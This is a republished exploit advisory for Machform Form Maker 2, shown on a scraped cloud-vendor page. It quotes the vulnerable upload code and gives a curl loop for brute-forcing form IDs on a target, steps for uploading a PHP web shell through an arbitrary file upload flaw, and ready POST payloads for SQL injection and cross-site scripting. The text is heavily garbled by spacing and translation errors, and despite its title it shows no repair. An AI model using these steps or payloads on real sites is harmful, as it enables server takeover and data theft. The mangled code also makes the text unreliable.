Machform Form Maker 2 multiple defects and repair

Source: Internet
Author: User
Tags mysql injection machform

######################################## ########### Title: machform form maker-Multiple Vulnerabilities # Author: Yashar shahinzadeh # developer: http://www.appnitro.com # Tested system n: Linux & Windows, PHP 5.2.9 # affected versions: 2 # Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar ######################################## ################# S Abstract: ========= 1. arbitrary File Upload 2. mySQL injection (Error based) and XSS 1. upload any file: ===================================== ...... if (! Empty ($ uploaded_files) {foreach ($ uploaded_files as $ element_name) {if (empty ($ form_review )) {// move file and check for invalid file $ destination_file = $ input ['machform _ data_path ']. DATA_DIR. "/form _ {$ form_id}/files/{$ element_name}-{$ record_insert_id}-{$ _ FILES [$ element_name] ['name']}"; if (move_uploaded_file ($ _ FILES [$ element_name] ['tmp _ name'], $ destination_file) {$ filename = mysql_real_escape_stri Ng ($ _ FILES [$ element_name] ['name']); $ query = "update ap_form _ {$ form_id} set $ element_name = '{$ element_name}-{$ record_insert_id}-{$ filename} 'where id =' $ record_insert_id '"; do_query ($ query) ;}} else {// for form with review enabled, append. tmp suffix to all uploaded files // move file and check for invalid file $ destination_file = $ input ['machform _ data_path ']. DATA_DIR. "/form _ {$ form_id}/files/{$ elemen T_name}-{$ record_insert_id}-{$ _ FILES [$ element_name] ['name']}. tmp "; if (move_uploaded_file ($ _ FILES [$ element_name] ['tmp _ name'], $ destination_file )) {$ filename = mysql_real_escape_string ($ _ FILES [$ element_name] ['name']); $ query = "update ap_form _ {$ form_id} _ review set $ element_name = '{$ element_name}-{$ record_insert_id}-{$ filename} 'where id =' $ record_insert_id' "; do_query ($ query);} if (! Empty ($ uploaded_file_lookup [$ element_name]) {unset ($ uploaded_file_lookup [$ element_name]) ;}}...... test exploitation: In beginning, the hacker must aim view. php located at the root of site, observing the lines inside of mentioned file wocould be a big lead to disclosure of vulnerability: $ input_array = ap_sanitize_input ($ _ POST ); $ submit_result = process_form ($ input_array); These two lines have functions leading to have both MySQL injection and Arbitrary file upload vulnerability. i'm not going to audit codes, I may just revoke strate the attack started by applying brute-force procedure on ID parameter so as to find a form consisting file upload form, it can be achieved by any program, I just issued a Linux command helped me find it properly: seq 1 500 | xargs-I XX-P32 curl-s http://target/view.php=XX -O XX. out grep "type = \" file \""*. out Afterwards, an HTML element followed by "for = "(. *) "must be specified, picture below gives better concept: http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg All have to be done is uploading PHP shell, and trying to find its name on server. The file will be uploaded in the path: http://www.bkjia.com /Data/form _ [ID]/[element name]-[mysql_insert_id ()]. php In URL above, [ID] is gathered in brute-force phase, [element name] is gathered by viewing HTML source, and [mysql_insert_id ()] shocould be brute-forced again. being relatively difficult, I 've recorded a clip demonstrating what I 've said: http://y-shahinzadeh.ir/tutorial/machform.rar 2. mySQL Injection (Error based) and XSS: ========================================================== = ...... $ input_array = ap_sanitize_input ($ _ POST );...... exploit (POST to view. php after finding HTML elements ): element_1 = 1 & element_2 = '& element_3 = 1 & form_id = 11 & submit = 1 element_1 = 1 & element_2 = % 27% 22% 28% 29% 26% 3 cScRiPt % 251% 3 eprompt % 20% 29% 3c % 2 fScRiPt % 3e & element_3 = 1 & form_id = 11 & submit = Enviar

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.